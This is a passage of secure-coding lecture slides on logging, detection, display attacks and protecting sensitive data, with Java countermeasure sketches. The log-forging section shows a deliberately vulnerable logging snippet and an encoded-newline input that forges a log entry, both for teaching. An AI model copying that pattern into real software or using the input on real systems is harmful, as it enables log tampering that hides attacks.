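The caller would store or send the tag alongside the payload and refuse to hand the payload to any deserializer when `isAuthentic` returns false.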

Quick aside: “Assume breach” paradigm
• Depending only on prevention doesn’t work
  – Some attackers do break through all protections
  – Esp. if software wasn’t designed & implemented to be secure (most software today)
• “Assume breach” mindset:
  – “limits the trust placed in applications, services, identities and networks…
  – by treating them all – both internal and external – as not secure and probably already compromised”
Source: “The Assume Breach paradigm”, https://www.eventtracker.com/newsletters/the-assume-breach-paradigm/

“Assume Breach”: The “new” paradigm?
• “Assume breach” mindset can help, but it depends on how it’s applied
  – Larger networks are best presumed breached (too big to prevent)
• If everything is actually always breached, you end up with the ridiculous:
  – Can’t do anything useful: no secure state to recover back to & use
  – Detection is often expensive (automation is not enough) & always misses some things
  – Recovering after the fact is often expensive & sometimes impossible
• Some say “assume breach” to justify failing to prevent attacks at all, even when prevention is cheaper & more effective, as it often is (bad!)
• Some say “assume breach” to:
  – Ensure that resources are also spent on detection & recovery (good!)
  – Ensure that the “least privilege” design principle is applied (good!)
• Focusing only on prevention, or only on detection & recovery, has always been bad
  – “Least privilege” is a 1970s S&S (Saltzer & Schroeder) principle; it’s certainly not new
  – Prevention is often cheaper: an ounce of prevention is still worth a pound of cure
  – Prevention reduces attacker successes, which makes detection & recovery practical
Need the total package: prevention and also detection & recovery

Detection & recovery’s impact on design & implementation
• Recovery: Plan for it
  – E.g., back up your data, enable reset back to a safe/known state, implement “degraded” state(s) (e.g., “read only” mode), enable migration to alternative systems/services, provide a user notification system (“we’re sorry to inform you…”)
  – Rate limiting can often detect & auto-recover (by request IP address, login ID, etc.); limits over a period of time can auto-handle burstiness
  – Often the problem is doing it, not its technical complexity… so identify these as security requirements, design them, & build them into your system before they are needed
• Detection: Key is logging (audit trails)
  – The logs can then be monitored, along with other indicators, to detect ongoing attacks
  – Detection is important: it is often the trigger for recovery
  – “How to monitor for detection” is outside our scope, but we do need to discuss how to make detection possible!
  – Thus, we need to discuss logging (an external system that is especially important for security)
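One way to picture the rate-limiting bullet is a fixed-window counter per key (request IP address, login ID, etc.). This is only a sketch under assumptions: the class `FixedWindowRateLimiter`, its limits, and the choice of a fixed window are illustrative, and a real deployment would also need to evict old keys.

```java
import java.util.HashMap;
import java.util.Map;

class FixedWindowRateLimiter {
    private final int maxRequests;
    private final long windowMillis;
    // key -> { window start time in ms, requests seen in this window }
    private final Map<String, long[]> state = new HashMap<>();

    FixedWindowRateLimiter(int maxRequests, long windowMillis) {
        this.maxRequests = maxRequests;
        this.windowMillis = windowMillis;
    }

    // Returns true if the request is allowed. The caller passes the current
    // time so the behavior is easy to test.
    synchronized boolean allow(String key, long nowMillis) {
        long[] s = state.get(key);
        if (s == null || nowMillis - s[0] >= windowMillis) {
            s = new long[] { nowMillis, 0 };   // new window: auto-recovery
            state.put(key, s);
        }
        if (s[1] >= maxRequests) {
            return false;                      // over the limit: reject (and log)
        }
        s[1]++;
        return true;
    }
}
```

Because the counter resets when a new window starts, a key that was blocked recovers automatically without operator action.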

Calling out to logging/debugging systems
• Centralize all logging/debugging, use consistently
  – Simplifies analysis (all data in one place)
  – Eases change/reconfiguration
• Log instead of revealing problem details to users
  – Ok to say there’s a problem, but don’t say too much
  – Attackers love it when you give them detailed data!
  – Record important successes & failures
• Try to reuse existing log systems
  – Less code, easier to integrate, etc.
  – Existing ones: log4j, java.util.logging, syslog, …
  – Deployments typically want to centralize logs so they can easily combine data from multiple sources, change how & how much to log, where it’s stored, send to a separate protected system, etc.
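A small sketch of “log instead of revealing problem details to users”, using java.util.logging. The class `AccountService`, its `lookup` method, and the simulated failure message are hypothetical and exist only to make the example self-contained.

```java
import java.util.logging.Level;
import java.util.logging.Logger;

class AccountService {
    private static final Logger LOG = Logger.getLogger(AccountService.class.getName());

    // Returns the text shown to the user.
    static String handle(String accountId) {
        try {
            return lookup(accountId);
        } catch (RuntimeException e) {
            // Full details (including the stack trace) go to the log only.
            LOG.log(Level.WARNING, "Account lookup failed", e);
            // The user learns that there is a problem, but not its details.
            return "Sorry, something went wrong. Please try again later.";
        }
    }

    // Stand-in for a real back-end call; it always fails in this sketch.
    static String lookup(String accountId) {
        throw new IllegalStateException("db connection refused at 10.0.0.5");
    }
}
```

Note that the untrusted `accountId` is deliberately not concatenated into the log message here; logging untrusted data safely requires encoding it first.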

Mature programs log often
• Logging is pervasive in mature code
  – “On average, every 30 lines of code contains one line of logging code. Similar density is observed in all the software we studied”
  – They studied widely-used OSS with at least 10 years of development history & large market share (#1 or #2), specifically Apache httpd, OpenSSH, PostgreSQL, and Squid
• Logging is beneficial for diagnosing production-run failures
  – “Log messages can speed up the diagnosis time of production-run failures by 2.2 times”
Source: D. Yuan, S. Park, and Y. Zhou. Characterizing logging practices in open-source software. In Proceedings of the 34th International Conference on Software Engineering, ICSE’12, pages 102–112, June 2012, http://opera.ucsd.edu/paper/log_icse12.pdf

When to log
• Logging systems are only useful if the important events are logged
• Log all important events, including:
  – Login, logout, & authorization changes
  – Anything possibly indicating an attack or an attempt to work around defenses
• Categorize messages so operators can configure what gets logged in production

If you must roll your own logging/debugging system
• Record date/time & source
  – Source = machine & application
  – Sub-second accuracy very helpful
• Log(category, message)
• Allow configuration of:
  – What to actually record (which categories)
  – Where to send it (file, remote system, etc.)
  – What to do on “log full” (Throw away old? New? Stop running?)
• Escape messages
… but try to reuse a good one instead (consider this list a checklist)

Log/debug entries can become security vulnerabilities
• Data destined for logs may include untrusted user data
  – Including debugging systems, which will be used, since operational systems sometimes have problems
• Attackers may intentionally create data that will create problems later, e.g.:
  – Crash/take over the logging system
  – Forge log entries
  – Create an attack on later retrieval
• Many logs store ASCII text
  – In that case, encode all nonprintable chars (esp. control chars) so they’re something else, e.g., URL-encode or \ddd

Log forging example (1)
    // Do not do this: the untrusted value is logged without encoding
    String val = request.getParameter("val");
    try {
        int value = Integer.parseInt(val);
    } catch (NumberFormatException e) {
        log.info("Failed to parse val=" + val);
    }
• If a user submits a “val” value of “twenty-one”, then this entry is logged:
    INFO: Failed to parse val=twenty-one

Log forging example (2)
• But if an attacker submits a “val” value of:
    twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
• Then the log will falsely record:
    INFO: Failed to parse val=twenty-one
    INFO: User logged out=badguy
• Possibly fooling later log viewers:
  – badguy “couldn’t” have done later actions
  – Make it appear things are okay, or confuse causes
  – Frame someone else
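A hedged sketch of one countermeasure to this forgery: percent-encode every byte outside printable ASCII (and “%” itself) before the untrusted value reaches the log, so an embedded newline cannot start a new entry. The helper name `LogSanitizer.sanitize` is hypothetical; an existing logging or encoding library may already offer an equivalent.

```java
import java.nio.charset.StandardCharsets;

class LogSanitizer {
    // Percent-encode '%' plus every byte outside printable ASCII, so CR, LF,
    // ESC, and other control characters are logged as visible text.
    static String sanitize(String untrusted) {
        if (untrusted == null) {
            return "(null)";
        }
        StringBuilder out = new StringBuilder();
        for (byte b : untrusted.getBytes(StandardCharsets.UTF_8)) {
            int c = b & 0xFF;
            if (c >= 0x20 && c <= 0x7E && c != '%') {
                out.append((char) c);
            } else {
                out.append(String.format("%%%02X", c));
            }
        }
        return out.toString();
    }
}
```

With this helper, the logging call becomes `log.info("Failed to parse val=" + LogSanitizer.sanitize(val));`, and the attacker’s input is recorded on a single line as `twenty-one%0A%0AINFO: User logged out=badguy`.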

Protect logs
• Prevent read or write log access by untrusted users
  – Logs are usually sent to a separate system in operation
• Logs give away a lot, including:
  – What you’re looking at… and what you aren’t
  – May include sensitive data
• Logs are useful for:
  – Debugging problems
  – Evidence of attack

Do not include passwords & other sensitive data in logs
• Logs should normally be private, but:
  – Sometimes logs will be revealed to others
  – The recipient, or the recipient’s later use, may be unauthorized
• Thus, don’t include passwords & very sensitive data in logs
• Beware of logging data that might include passwords
  – Ensure URLs don’t include passwords!
• If you must include it, log encrypted data (or use a salted hash)
• Example: IEEE log data breach
  – 99,979 usernames + plaintext (!) passwords
  – Publicly available on their FTP server for at least one month prior to discovery on 2012-09-18
  – More info: http://ieeelog.com/
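As a fallback for URLs that do carry secrets, a logger can redact known-sensitive query parameters before writing the entry. This sketch is an assumption-laden illustration: the class `UrlRedactor` and its list of parameter names are hypothetical, and it does not handle credentials in the user-info part of a URL.

```java
import java.util.regex.Pattern;

class UrlRedactor {
    // Hypothetical list of sensitive parameter names; extend for your system.
    private static final Pattern SENSITIVE = Pattern.compile(
        "(?i)([?&;](?:password|passwd|pwd|token|secret)=)[^&;#\\s]*");

    // Replace the value of each sensitive parameter with a fixed marker.
    static String redact(String url) {
        return SENSITIVE.matcher(url).replaceAll("$1[REDACTED]");
    }
}
```

The better fix remains the one on the slide: never put the password in the URL in the first place, because redaction only protects the logs that you control.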

Display attacks
• Many displays simulate long-gone consoles
  – ESCAPE + codes can change color, erase the screen, sometimes even send screen content back
  – Result: Merely displaying a filename or file content can cause command execution
• Many systems store info in HTML/XML
  – May include JavaScript, etc., that is executed on display
• Consider encoding data that users/admins might directly display later
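The encoding idea can be sketched for the two displays named above. The class `DisplayEncoder` and both method names are hypothetical; for HTML in particular, a maintained encoding library is usually a better choice than hand-written code.

```java
class DisplayEncoder {
    // Encode the characters that are special in HTML text and attributes.
    static String forHtml(String s) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Make control characters (including ESC, 0x1B) visible instead of
    // letting a terminal interpret them.
    static String forTerminal(String s) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if (Character.isISOControl(c)) {
                out.append(String.format("\\x%02X", (int) c));
            } else {
                out.append(c);
            }
        }
        return out.toString();
    }
}
```

A filename that begins with an “erase screen” escape sequence is then shown as the harmless text `\x1B[2J…` rather than being executed by the terminal.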

Call Only Interfaces Intended for Programmers
• Usually unwise to invoke a program intended for human interaction (text or GUI)
  – Programs for humans are intentionally rich & often difficult to completely control
  – May have “escape hatches” to unintended functions
  – Interactive programs often try to intuit the “most likely” meaning
    • May not be what you were expecting
    • Attacker may find a way to exploit this
• Usually there’s a different program/API for other programs’ use; use that instead
  – E.g., don’t invoke ed/vi/emacs for text processing, use sed/awk/perl
• Similarly, provide an API/programmer interface if sensible
  – Perhaps have a GUI that then invokes the API (a good approach anyway)

Check All System Call Returns
• Check every system call that can return an error condition
  – Nearly all system calls require limited system resources, and users can often affect resources in a variety of ways
  – If the error cannot be handled gracefully, then fail safe
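In Java the same rule applies to library methods that report failure through a return value instead of an exception, such as `java.io.File.delete()`. A minimal sketch, with a hypothetical wrapper named `CheckedFileOps.deleteOrFail`:

```java
import java.io.File;
import java.io.IOException;

class CheckedFileOps {
    // File.delete() returns false on failure; ignoring that value would let
    // the program continue as if the file were gone.
    static void deleteOrFail(File f) throws IOException {
        if (!f.delete()) {
            throw new IOException("Could not delete " + f);
        }
    }
}
```

Turning the ignored boolean into an exception forces the caller either to handle the failure or to stop, which is the “fail safe” default.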

Check information when it returns
• Reuse input filtering concepts from earlier… values from libraries are yet more input
  – If number: Is it within some plausible range?
  – If string: Does it match a whitelist filter?
  – If complex (e.g., file/data type):
    • Is it one of the permitted file/data types?
  – If an image (e.g., tile from geometry server):
    • Height/width in range? Is it really an image format?
  – If it takes too long to respond, consider alternatives
• This can be hard to do everywhere, in which case, prioritize where it’s riskier
• Can be helpful in countering defects in components, even if it is not a security issue
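The checks above might look like the following sketch. Every limit, pattern, and type list here is an assumption chosen for illustration, as are the class and method names; real values depend on what the called component is supposed to return.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import java.util.regex.Pattern;

class ResponseChecks {
    // Hypothetical whitelist pattern and permitted types.
    private static final Pattern NAME = Pattern.compile("[A-Za-z0-9_-]{1,64}");
    private static final Set<String> ALLOWED_TYPES =
        new HashSet<>(Arrays.asList("image/png", "image/jpeg"));

    // Number: is it within a plausible range?
    static boolean inRange(long value, long min, long max) {
        return value >= min && value <= max;
    }

    // String: does the whole value match the whitelist pattern?
    static boolean validName(String s) {
        return s != null && NAME.matcher(s).matches();
    }

    // Complex data: is it one of the permitted types?
    static boolean allowedType(String mimeType) {
        return mimeType != null && ALLOWED_TYPES.contains(mimeType);
    }

    // Image tile: are the reported dimensions plausible?
    static boolean plausibleTile(int width, int height) {
        return inRange(width, 1, 4096) && inRange(height, 1, 4096);
    }
}
```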

Counter Web Bugs When Retrieving Embedded Content
• Some data formats (e.g., HTML) can embed references to content that is automatically retrieved when the data is viewed (transclusion)
  – Without waiting for user selection
  – Privacy issue: enables a “web bug”, so others can obtain information about a reader without the reader’s knowledge
• In a web bug:
  – A reference is intentionally inserted into a document and used by the content author to track who reads a document, where, and how often (e.g., a 1x1 pixel “image” loaded from somewhere else)
  – Can see how a “bugged” document is passed from one person to another or from one organization to another
• Primarily an issue with file format design (can’t undo HTML)
• If your users value their privacy, you probably will want to limit the automatic downloading of included files (e.g., from other sites)

Hide Sensitive Information (1)
• Hide sensitive information (e.g., private, personally-identifying information, passwords, …)
  – In transit (input & output)
  – At rest (stored)
• In transit: web-based applications
  – Typically use https: (HTTP on top of SSL or TLS)
  – Don’t allow GET to submit sensitive information; it is encoded in the Request-URI, which is often logged
• Encrypt any storage
  – Doesn’t help if the attacker breaks into the application
  – Does defend against someone who gets the storage device without the encryption keys
• Encrypt passwords (with salted hashes, explained later)

Hide Sensitive Information (2)
• Don’t send it, if you don’t have to
  – E.g., create special “local” ids when sending to other sites
  – Translate back
  – Make it hard for external sites to reveal info about your users, data, etc.
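The “local id” idea can be sketched as a two-way table between real identifiers and random stand-ins. The class `LocalIdMapper` is hypothetical and keeps its table in memory; a real system would persist the mapping and protect it like any other sensitive data.

```java
import java.math.BigInteger;
import java.security.SecureRandom;
import java.util.HashMap;
import java.util.Map;

class LocalIdMapper {
    private final SecureRandom random = new SecureRandom();
    private final Map<String, String> toLocal = new HashMap<>();
    private final Map<String, String> toReal = new HashMap<>();

    // Return a random stand-in for realId, creating one on first use.
    synchronized String localIdFor(String realId) {
        String existing = toLocal.get(realId);
        if (existing != null) {
            return existing;
        }
        String local;
        do {
            byte[] buf = new byte[16];          // 128 random bits
            random.nextBytes(buf);
            local = new BigInteger(1, buf).toString(16);
        } while (toReal.containsKey(local));
        toLocal.put(realId, local);
        toReal.put(local, realId);
        return local;
    }

    // Translate back when the external site replies; null if unknown.
    synchronized String realIdFor(String localId) {
        return toReal.get(localId);
    }
}
```

The external site only ever sees the random value, so it cannot reveal the real identifier even if it is compromised.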

Conclusions
• In practice, must depend on other components
  – Libraries, OS, DBMS, etc.
• Be careful about how you call out to them
  – Metacharacters in particular can cause trouble
  – SQL, command shell, filenames, log/debug entries
  – Don’t allow anything to be sent to another component unless you’re sure it’s okay
  – SQL: Use prepared statements (usual approach)
  – In other cases, often need to escape data to be sent
  – Input validation is often not enough
• Support detection & recovery, e.g., by logging
• Be careful about what you accept back

Released under CC BY-SA 3.0
• This presentation is released under the Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) license
• You are free:
  – to Share: to copy, distribute and transmit the work
  – to Remix: to adapt the work
  – to make commercial use of the work
• Under the following conditions:
  – Attribution: You must attribute the work in the manner specified by the author or licensor (but not in any way that suggests that they endorse you or your use of the work)
  – Share Alike: If you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one
• These conditions can be waived by permission from the copyright holder
  – dwheeler at dwheeler dot com
• Details at: http://creativecommons.org/licenses/by-sa/3.0/
• Attribute me as “David A. Wheeler”